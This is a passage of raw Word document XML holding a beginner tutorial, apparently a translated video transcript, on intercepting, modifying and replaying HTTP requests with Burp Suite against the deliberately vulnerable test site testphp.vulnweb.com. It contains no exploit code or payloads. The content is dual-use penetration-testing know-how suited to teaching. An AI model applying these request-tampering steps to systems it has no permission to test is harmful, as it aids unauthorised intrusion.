                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3034030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2813E97D" w14:textId="77777777" w:rsidR="007C3E28" w:rsidRDefault="007C3E28"/>
    <w:p w14:paraId="21DF79C7" w14:textId="28C709E4" w:rsidR="007C3E28" w:rsidRDefault="007C3E28">
      <w:r>
        <w:tab/>
        <w:t>But here the Burp Suite tool will capture the websites. You have to come back to this tool and click on proxy here. Here you have to turn on interception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6B1D13" w14:textId="77777777" w:rsidR="007C3E28" w:rsidRDefault="007C3E28"/>
    <w:p w14:paraId="259547AA" w14:textId="6299E501" w:rsidR="007C3E28" w:rsidRDefault="007C3E28">
      <w:r w:rsidRPr="007C3E28">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44F35458" wp14:editId="13534545">
            <wp:extent cx="5733415" cy="772795"/>
            <wp:effectExtent l="0" t="0" r="635" b="8255"/>
            <wp:docPr id="99888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84485" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="772795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCA0F9A" w14:textId="77777777" w:rsidR="007C3E28" w:rsidRDefault="007C3E28"/>
    <w:p w14:paraId="36115990" w14:textId="38FBE66C" w:rsidR="007C3E28" w:rsidRDefault="007C3E28">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Then again you have to go to the browser here. After going to the browser here we will use a one label website for testing. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B3262B" w14:textId="77777777" w:rsidR="007C3E28" w:rsidRDefault="007C3E28"/>
    <w:p w14:paraId="4B9013E0" w14:textId="448873FE" w:rsidR="007C3E28" w:rsidRDefault="007C3E28">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Test website: </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="005F70D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64C00EFB" w14:textId="77777777" w:rsidR="007C3E28" w:rsidRDefault="007C3E28"/>
    <w:p w14:paraId="4C31A312" w14:textId="26A0E8D8" w:rsidR="007C3E28" w:rsidRDefault="007C3E28">
      <w:r w:rsidRPr="007C3E28">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06116C88" wp14:editId="7106C2D7">
            <wp:extent cx="5733415" cy="2920365"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="26002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29656" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="2920365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="264DC144" w14:textId="77777777" w:rsidR="007C3E28" w:rsidRDefault="007C3E28"/>
    <w:p w14:paraId="52196FA2" w14:textId="7146C358" w:rsidR="007C3E28" w:rsidRDefault="007C3E28">
      <w:r>
        <w:t xml:space="preserve">We will search this website here. </w:t>
      </w:r>
      <w:r w:rsidR="00E715B9">
        <w:t>After searching</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the website, as you can see its complete request, it</w:t>
      </w:r>
      <w:r w:rsidR="00A1514F">
        <w:t xml:space="preserve"> has come here in our tool. Here its host name, its user agent, its access, access language, access encoding, all these things have come here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5934F77D" w14:textId="77777777" w:rsidR="00C1171C" w:rsidRDefault="00C1171C"/>
    <w:p w14:paraId="43E47F21" w14:textId="1B0E16F5" w:rsidR="000515CA" w:rsidRDefault="00A1514F">
      <w:r w:rsidRPr="00A1514F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="069377D8" wp14:editId="6D0E7690">
            <wp:extent cx="5733415" cy="3526790"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="101281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17294" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3526790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="709F7E02" w14:textId="77777777" w:rsidR="00A1514F" w:rsidRDefault="00A1514F"/>
    <w:p w14:paraId="1459CB25" w14:textId="00FFAE80" w:rsidR="00A1514F" w:rsidRDefault="00A1514F">
      <w:r>
        <w:t>Website is loading on your browser. This means that the request for our website has not yet reached the server.</w:t>
      </w:r>
      <w:r w:rsidR="0041451C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCFDE95" w14:textId="77777777" w:rsidR="0041451C" w:rsidRDefault="0041451C"/>
    <w:p w14:paraId="2E339746" w14:textId="278FBDF8" w:rsidR="0041451C" w:rsidRDefault="0041451C">
      <w:r w:rsidRPr="0041451C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5077A78A" wp14:editId="1BD5C101">
            <wp:extent cx="5733415" cy="2793365"/>
            <wp:effectExtent l="0" t="0" r="635" b="6985"/>
            <wp:docPr id="100933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38731" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="2793365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04367B8D" w14:textId="77777777" w:rsidR="0041451C" w:rsidRDefault="0041451C"/>
    <w:p w14:paraId="49EF2B25" w14:textId="3B574F7F" w:rsidR="0041451C" w:rsidRDefault="0041451C">
      <w:r>
        <w:t xml:space="preserve">She’s here on burb to tool. And we can totally change this request. You can modify it as per your requirement. And after modifying, when forward it here, then this request will go to the server and we will get the response. Like you can see that I have clicked forward. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DDA58E" w14:textId="77777777" w:rsidR="0041451C" w:rsidRDefault="0041451C"/>
    <w:p w14:paraId="590DCD25" w14:textId="384D5363" w:rsidR="0041451C" w:rsidRDefault="0041451C">
      <w:r w:rsidRPr="0041451C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0984C9D8" wp14:editId="1BFEE2E7">
            <wp:extent cx="5733415" cy="3418840"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="19710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8035" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3418840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7620C8" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="7AD457D1" w14:textId="4EEF602E" w:rsidR="00C776D2" w:rsidRDefault="0041451C">
      <w:r>
        <w:t xml:space="preserve">Now my website has opened here. So that’s how the burp tool works. Capture the website. This basically works like a man in the middle attack which works on proxy chains. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F39F1D9" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="0294A297" w14:textId="637109A6" w:rsidR="0041451C" w:rsidRDefault="0041451C">
      <w:r w:rsidRPr="0041451C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="028C007F" wp14:editId="2E1E0702">
            <wp:extent cx="5733415" cy="2900680"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="162744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47678" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="2900680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7259E7A2" w14:textId="5C6A2FEF" w:rsidR="00C776D2" w:rsidRDefault="00E715B9">
      <w:r>
        <w:t xml:space="preserve">So again, we will open another website. </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="005F70D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> now after opening this website, we will intercept its request here, we’ll come here to proxy and here to intercept. And here you can also see the history of all the https requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65849E02" w14:textId="77777777" w:rsidR="00E715B9" w:rsidRDefault="00E715B9"/>
    <w:p w14:paraId="65D9FFBD" w14:textId="2A08A4B4" w:rsidR="00E715B9" w:rsidRDefault="00E715B9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28A34CDB" wp14:editId="425B3D9F">
            <wp:extent cx="5733415" cy="3017520"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="162796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64030" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3017520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BF8FE7" w14:textId="77777777" w:rsidR="00E715B9" w:rsidRDefault="00E715B9"/>
    <w:p w14:paraId="2F338D2E" w14:textId="5C208FF9" w:rsidR="00C776D2" w:rsidRDefault="00E715B9">
      <w:r>
        <w:t xml:space="preserve">So </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i’ll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA3A15">
        <w:t>come back here to intercept. And here we can also change the user agent like this number and send it</w:t>
      </w:r>
      <w:r w:rsidR="009F3A2F">
        <w:t>. Like here I will check on one and our user agent will change after making the changes, I will simply forward it. And this request will go to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BBF407" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="308D93F9" w14:textId="1FD769D0" w:rsidR="00C776D2" w:rsidRDefault="007F7C07">
      <w:r w:rsidRPr="007F7C07">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26031A98" wp14:editId="2E26B51A">
            <wp:extent cx="5733415" cy="3410585"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="2880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14154" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3410585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DCEA15" w14:textId="77777777" w:rsidR="007F7C07" w:rsidRDefault="007F7C07"/>
    <w:p w14:paraId="1F5AA8A9" w14:textId="5F65506A" w:rsidR="007F7C07" w:rsidRDefault="007F7C07">
      <w:r>
        <w:t xml:space="preserve">As you can see that this request came to me. And I modified it and generated another request and sent it to the server. And our second request got opened here. </w:t>
      </w:r>
      <w:r w:rsidR="00B96D59">
        <w:t>So,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we intercepted the requested at the basic level. Modified it as per my requirement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427292B8" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="40737FD3" w14:textId="2B27DF8F" w:rsidR="00C776D2" w:rsidRDefault="00B96D59">
      <w:r w:rsidRPr="00B96D59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33B82CE5" wp14:editId="5DCF4257">
            <wp:extent cx="5733415" cy="2666365"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="207117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70405" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="2666365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="401FF77E" w14:textId="27DBD73F" w:rsidR="00B96D59" w:rsidRDefault="00B96D59">
      <w:r>
        <w:t xml:space="preserve">Changed it as per my requirement. Now, if we want to repeat this request again </w:t>
      </w:r>
      <w:r w:rsidR="00944DA2">
        <w:t>and again put it in repeated mode, then we can do that here also.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FB9978" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="4177FA8E" w14:textId="0DFDE3B6" w:rsidR="00944DA2" w:rsidRDefault="00944DA2">
      <w:r w:rsidRPr="00944DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60158366" wp14:editId="2B786B3E">
            <wp:extent cx="5733415" cy="3363595"/>
            <wp:effectExtent l="0" t="0" r="635" b="8255"/>
            <wp:docPr id="117263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32419" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3363595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CFDD94" w14:textId="77777777" w:rsidR="00944DA2" w:rsidRDefault="00944DA2"/>
    <w:p w14:paraId="1C7A0A3A" w14:textId="07873810" w:rsidR="00944DA2" w:rsidRDefault="00944DA2">
      <w:r>
        <w:t>We will do that here also. We will right click on our proxy and add it here to the repeater. Then we will go to the repeater tab here. And here all its parameters will open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEA0BB4" w14:textId="77777777" w:rsidR="00944DA2" w:rsidRDefault="00944DA2"/>
    <w:p w14:paraId="343B65F0" w14:textId="538B5DFE" w:rsidR="00C776D2" w:rsidRDefault="00944DA2">
      <w:r w:rsidRPr="00944DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24A1AF5E" wp14:editId="7D550187">
            <wp:extent cx="5733415" cy="2870200"/>
            <wp:effectExtent l="0" t="0" r="635" b="6350"/>
            <wp:docPr id="203259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91162" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="2870200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC37BF4" w14:textId="77777777" w:rsidR="00944DA2" w:rsidRDefault="00944DA2"/>
    <w:p w14:paraId="0B51E854" w14:textId="2AF74A9B" w:rsidR="00944DA2" w:rsidRDefault="00944DA2">
      <w:r>
        <w:t xml:space="preserve">Here we can send it by modifying its parameters. Like I will modify its parameters. ID = 1 and here ID = 2 P made this modification here.  Now I will send this request here. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A47BD1E" w14:textId="77777777" w:rsidR="004579B6" w:rsidRDefault="004579B6"/>
    <w:p w14:paraId="4E62ACD7" w14:textId="1C932E0D" w:rsidR="004579B6" w:rsidRDefault="004579B6">
      <w:r w:rsidRPr="004579B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="555A7260" wp14:editId="11A02087">
            <wp:extent cx="5733415" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="16206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1052" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6D6BD4" w14:textId="77777777" w:rsidR="004579B6" w:rsidRDefault="004579B6"/>
    <w:p w14:paraId="0BC4CCF9" w14:textId="77777777" w:rsidR="00BE6490" w:rsidRDefault="004579B6">
      <w:r>
        <w:t>So, in this way, you can modify the request parameters and click on send. But now if we want to check the features in our request on this website, then there is a function for that also. We will come here to proxy and intercept.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260A78B2" w14:textId="77777777" w:rsidR="00BE6490" w:rsidRDefault="00BE6490"/>
    <w:p w14:paraId="6F910E4C" w14:textId="7AC505B3" w:rsidR="004579B6" w:rsidRDefault="004579B6">
      <w:r>
        <w:t>This is our request. And click on this. But here you will get the scan option. But here we do not have scan option available. Because we get all these latest features in the pro version of group suite which is the paid version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781FAA0B" w14:textId="77777777" w:rsidR="00F20B08" w:rsidRDefault="00F20B08"/>
    <w:p w14:paraId="1F7B2B8A" w14:textId="1792C329" w:rsidR="00F20B08" w:rsidRDefault="00F20B08">
      <w:r w:rsidRPr="00F20B08">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7455AB65" wp14:editId="552B8A1D">
            <wp:extent cx="5733415" cy="3410585"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="140067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79835" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3410585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABD572D" w14:textId="77777777" w:rsidR="00F20B08" w:rsidRDefault="00F20B08"/>
    <w:p w14:paraId="71F8CCCA" w14:textId="0273E1E1" w:rsidR="00F20B08" w:rsidRDefault="00F20B08">
      <w:r>
        <w:t xml:space="preserve">We are using the free version here. That’s why we have the scan option disabled here. Otherwise, here you can automatically scan and find out all the vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="00BE6490">
        <w:t>in this entire request on this entire website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A175EB2" w14:textId="77777777" w:rsidR="00BE6490" w:rsidRDefault="00BE6490"/>
    <w:p w14:paraId="5449EC1B" w14:textId="6D0C14F2" w:rsidR="00BE6490" w:rsidRDefault="00BE6490">
      <w:r>
        <w:t>Now after scanning at basic level, we will forward this request. And our interception here will be empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FB5C79" w14:textId="77777777" w:rsidR="00BE6490" w:rsidRDefault="00BE6490"/>
    <w:p w14:paraId="47E51216" w14:textId="41C26E33" w:rsidR="00BE6490" w:rsidRDefault="00BE6490">
      <w:r w:rsidRPr="00BE6490">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B0A8320" wp14:editId="0014349A">
            <wp:extent cx="5733415" cy="2897505"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="203109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98111" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="2897505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7452D36C" w14:textId="77777777" w:rsidR="00BE6490" w:rsidRDefault="00BE6490"/>
    <w:p w14:paraId="6F9A0D27" w14:textId="77777777" w:rsidR="000A6815" w:rsidRDefault="00BE6490">
      <w:r>
        <w:t>Again, here we will open the website</w:t>
      </w:r>
      <w:r w:rsidR="000A6815">
        <w:t>(</w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidR="000A6815" w:rsidRPr="005F70D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000A6815">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Now we have generated our request back. Now we will perform spidering here. Meaning we will be mapping on our website. For that we have generated the request here. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E21143" w14:textId="77777777" w:rsidR="000A6815" w:rsidRDefault="000A6815"/>
    <w:p w14:paraId="5C4AF6E7" w14:textId="77777777" w:rsidR="000A6815" w:rsidRDefault="00BE6490">
      <w:r>
        <w:t xml:space="preserve">Now we will go to the target here. After going </w:t>
      </w:r>
      <w:r w:rsidR="000A6815">
        <w:t>to the end target, on the side mapping, our request will come test php.com,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A6815">
        <w:t>this domain has come to us. We will add this domain to the scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BBA06B" w14:textId="77777777" w:rsidR="000A6815" w:rsidRDefault="000A6815"/>
    <w:p w14:paraId="73A2B40E" w14:textId="36404EB4" w:rsidR="000A6815" w:rsidRDefault="000A6815">
      <w:r w:rsidRPr="000A6815">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C1810E0" wp14:editId="75488408">
            <wp:extent cx="5733415" cy="3253105"/>
            <wp:effectExtent l="0" t="0" r="635" b="4445"/>
            <wp:docPr id="58136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62763" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3253105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B65F1FA" w14:textId="77777777" w:rsidR="000A6815" w:rsidRDefault="000A6815"/>
    <w:p w14:paraId="1F65B591" w14:textId="77777777" w:rsidR="000A6815" w:rsidRDefault="000A6815">
      <w:r>
        <w:t>Here we will get a notification and we will click on Yes. Here we will go to the scope and check. This domain of ours has been successfully added to the scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604444B6" w14:textId="77777777" w:rsidR="000A6815" w:rsidRDefault="000A6815"/>
    <w:p w14:paraId="2748975D" w14:textId="258FA9BE" w:rsidR="000A6815" w:rsidRDefault="000A6815">
      <w:r w:rsidRPr="000A6815">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="136FB2FF" wp14:editId="1A0E7BB0">
            <wp:extent cx="5733415" cy="3361690"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="198850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05546" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
